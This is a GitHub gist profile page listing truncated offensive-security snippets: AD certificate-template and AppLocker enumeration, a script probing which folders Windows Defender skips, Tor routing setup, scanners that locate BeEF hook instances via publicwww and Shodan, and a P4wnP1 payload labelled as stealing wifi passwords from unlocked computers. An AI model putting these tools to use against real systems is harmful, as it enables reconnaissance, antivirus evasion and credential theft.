Skip to content

Instantly share code, notes, and snippets.

View tmap's full-sized avatar

Cristian Mariolini tmap

View GitHub Profile
function Get-CertificateTemplateAccess {
[CmdletBinding()]
param(
[Parameter(Mandatory=$false)]
[string]$TemplateName = "*",
[Parameter(Mandatory=$false)]
[string]$IdentityReference = "*",
[Parameter(Mandatory=$false)]
Import-Module AppLocker
[xml]$data = Get-AppLockerPolicy -Effective -Xml
# Initialize an array to store rule details
$rules = @()
$folderPath = "C:\gg"
if (-Not (Test-Path -Path $folderPath)) {
New-Item -ItemType Directory -Path $folderPath
}
$topExtensions = @(
".txt", ".log", ".json", ".xml", ".csv", ".html", ".htm", ".php", ".js", ".css",
".py", ".java", ".c", ".cpp", ".cs", ".rb", ".swift", ".go", ".sh", ".bat",
".exe", ".dll", ".bin", ".iso", ".img", ".zip", ".rar", ".7z", ".tar", ".gz",
$mpCmdRunPath = "C:\Program Files\Windows Defender\MpCmdRun.exe"
$directories = Get-ChildItem -Path C:\ -Directory -recurse -ErrorAction SilentlyContinue
foreach ($directory in $directories) {
$dirPath = $directory.FullName
try {
$output = & $mpCmdRunPath -Scan -ScanType 3 -File "$dirPath\*" 2>$null
if ($output -match "Scanning .* was skipped") {
@tmap
tmap / gist:1f86dafa9e515f8ba281ec3a329ca667
Last active October 6, 2024 20:11
force through tor, allow local ssh
sudo apt update
sudo apt install tor -y
sudo nano /etc/tor/torrc
add:
VirtualAddrNetworkIPv4 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353
@tmap
tmap / tritip.py
Created September 27, 2018 10:48
pwn beef instances on hacked websites through "publicwww" API
import requests
from contextlib import closing
import csv
import sys
api_key = "publicwww_apikey"
search_for_hook_js="%223000%2Fhook.js%22"
try:
req="https://publicwww.com/websites/"+search_for_hook_js+"/?export=csvsnippets&key="+api_key
@tmap
tmap / picanha.py
Last active October 1, 2018 08:53
import shodan
import sys
import requests
API_KEY = "apitoken"
try:
api = shodan.Shodan(API_KEY)
result = api.search('port:3000 product:"Apache httpd" centOS')
@tmap
tmap / payload.txt
Created December 12, 2017 14:10
P4wnP1 - Steals wifi passwords from unlocked computers
#P4wnP1
# ==========================
#
# Steals wifi passwords from unlocked computers
# freely inspired by https://github.com/mame82/P4wnP1/tree/master/payloads/hakin9_tutorial
UMSLABEL="WIFI"
fatlabel $wdir/USB_STORAGE/image.bin $UMSLABEL
# =============================
@tmap
tmap / VIS - Very Italian Sausages
Last active September 27, 2018 08:23
VIS - Very Italian Sausages
from kitchen import seasonings
import sausage_making
def do_things():
# grind function takes 2 args, meat type and % of the total
sausage_making.grind(pork_butt,70)
sausage_making.grind(chuck_steak,15)
sausage_making.grind(pork_fatback,15)
# add spices func takes 2 args, type and % of the total

Keybase proof

I hereby claim:

  • I am tmap on github.
  • I am tmap (https://keybase.io/tmap) on keybase.
  • I have a public key whose fingerprint is 1249 18C7 F4D6 0DFF D0A4 D87E 12E9 5BB0 737B EEC7

To claim this, I am signing this object: